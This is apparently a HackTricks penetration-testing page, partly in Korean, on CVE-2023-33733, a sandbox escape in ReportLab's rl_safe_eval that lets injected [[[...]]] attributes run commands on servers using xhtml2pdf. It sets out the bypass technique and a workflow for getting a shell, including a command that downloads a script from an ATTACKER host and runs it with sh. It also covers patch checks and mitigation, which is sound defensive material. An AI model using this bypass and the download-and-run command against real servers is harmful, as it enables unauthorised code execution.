ReportLab/xhtml2pdf [[[…]]] 표현식 평가 RCE (CVE-2023-33733)

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

이 페이지는 ReportLab의 rl_safe_eval에서 발생하는 실용적인 샌드박스 탈출 및 RCE 수단을 문서화합니다. 이 취약점은 xhtml2pdf 및 기타 PDF 생성 파이프라인에서 사용자 제어 HTML을 PDF로 렌더링할 때 악용될 수 있습니다.

CVE-2023-33733은 ReportLab 3.6.12까지(포함) 영향을 미칩니다. 특정 속성 컨텍스트(예: color)에서 [[[ … ]]]로 감싼 값은 rl_safe_eval에 의해 서버 측에서 평가됩니다. 화이트리스트된 builtin(pw)에서 시작해 해당 Python 함수의 globals로 피벗하는 페이로드를 만들면, 공격자는 os 모듈에 접근해 명령을 실행할 수 있습니다.

Key points

  • Trigger: inject [[[ … ]]] into evaluated attributes such as within markup parsed by ReportLab/xhtml2pdf.
  • Sandbox: rl_safe_eval replaces dangerous builtins but evaluated functions still expose globals.
  • Bypass: craft a transient class Word to bypass rl_safe_eval name checks and access the string “globals” while avoiding blocked dunder filtering.
  • RCE: getattr(pow, Word('__globals__'))['os'].system('<cmd>')
  • Stability: Return a valid value for the attribute after execution (for color, use and ‘red’).

When to test

  • Applications that expose HTML-to-PDF export (profiles, invoices, reports) and show xhtml2pdf/ReportLab in PDF metadata or HTTP response comments.
  • exiftool profile.pdf | egrep ‘Producer|Title|Creator’ → “xhtml2pdf” producer
  • HTTP response for PDF often starts with a ReportLab generator comment

How the sandbox bypass works

  • rl_safe_eval removes or replaces many builtins (getattr, type, pow, …) and applies name filtering to deny attributes starting with __ or in a denylist.
  • However, safe functions live in a globals dictionary accessible as func.globals.
  • Use type(type(1)) to recover the real builtin type function (bypassing ReportLab’s wrapper), then define a Word class derived from str with mutated comparison behavior so that:
  • .startswith(‘’) → always False (bypass name startswith(‘’) check)
  • .eq returns False only at first comparison (bypass denylist membership checks) and True afterwards (so Python getattr works)
  • .hash equals hash(str(self))
  • With this, getattr(pow, Word(‘globals’)) returns the globals dict of the wrapped pow function, which includes an imported os module. Then: ['os'].system('<cmd>').

Minimal exploitation pattern (attribute example) Place payload inside an evaluated attribute and ensure it returns a valid attribute value via boolean and ‘red’.

exploit

  • The list-comprehension form allows a single expression acceptable to rl_safe_eval.
  • The trailing and ‘red’ returns a valid CSS color so the rendering doesn’t break.
  • Replace the command as needed; use ping to validate execution with tcpdump.

Operational workflow

  1. Identify PDF generator
  • PDF Producer shows xhtml2pdf; HTTP response contains ReportLab comment.
  1. Find an input reflected into the PDF (e.g., profile bio/description) and trigger an export.
  2. Verify execution with low-noise ICMP
  • Run: sudo tcpdump -ni <iface> icmp
  • Payload: … system('ping <your_ip>')
  • Windows often sends exactly four echo requests by default.
  1. Establish a shell
  • For Windows, a reliable two-stage approach avoids quoting/encoding issues:
  • Stage 1 (download):

exploit

  • Stage 2 (execute):

exploit

  • For Linux targets, similar two-stage with curl/wget is possible:
  • system(‘curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s’)

Notes and tips

  • Attribute contexts: color is a known evaluated attribute; other attributes in ReportLab markup may also evaluate expressions. If one location is sanitized, try others rendered into the PDF flow (different fields, table styles, etc.).
  • Quoting: Keep commands compact. Two-stage downloads drastically reduce quoting and escaping headaches.
  • Reliability: If exports are cached or queued, slightly vary the payload (e.g., random path or query) to avoid hitting caches.

Patch status (2024–2025) and identifying backports

  • 3.6.13 (27 Apr 2023) rewrote colors.toColor to an AST-walk parser; newer 4.x releases keep this path. Forcing rl_settings.toColorCanUse to rl_safe_eval or rl_extended_literal_eval re-enables the vulnerable evaluator even on current versions.
  • Several distributions ship backported fixes while keeping version numbers such as 3.6.12-1+deb12u1; do not rely on the semantic version alone. Grep colors.py for ast.parse or inspect toColor at runtime to confirm the safe parser is in use (see quick check below).
  • Quick local check to see whether the AST-based fix is present:
python - <<'PY'
import inspect
from reportlab.lib import colors
src = inspect.getsource(colors.toColor)
print('AST-based toColor' if 'ast.parse' in src else 'rl_safe_eval still reachable')
PY

완화 및 탐지

  • ReportLab을 3.6.13 이상으로 업그레이드하세요 (CVE-2023-33733 수정됨). 배포판 패키지의 보안 권고도 추적하세요.
  • 엄격한 입력 검증 및 정화(sanitization) 없이 사용자 제어 HTML/마크업을 xhtml2pdf/ReportLab에 직접 전달하지 마세요. 입력이 신뢰할 수 없는 경우 [[[…]]] 평가 구문과 공급업체 전용 태그를 제거/차단하세요.
  • 신뢰할 수 없는 입력에 대해 rl_safe_eval 사용을 완전히 비활성화하거나 래핑하는 것을 고려하세요.
  • PDF 생성 중에 의심스러운 아웃바운드 연결을 모니터링하세요(예: 문서 내보내기 시 앱 서버에서 발생하는 ICMP/HTTP).

References

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기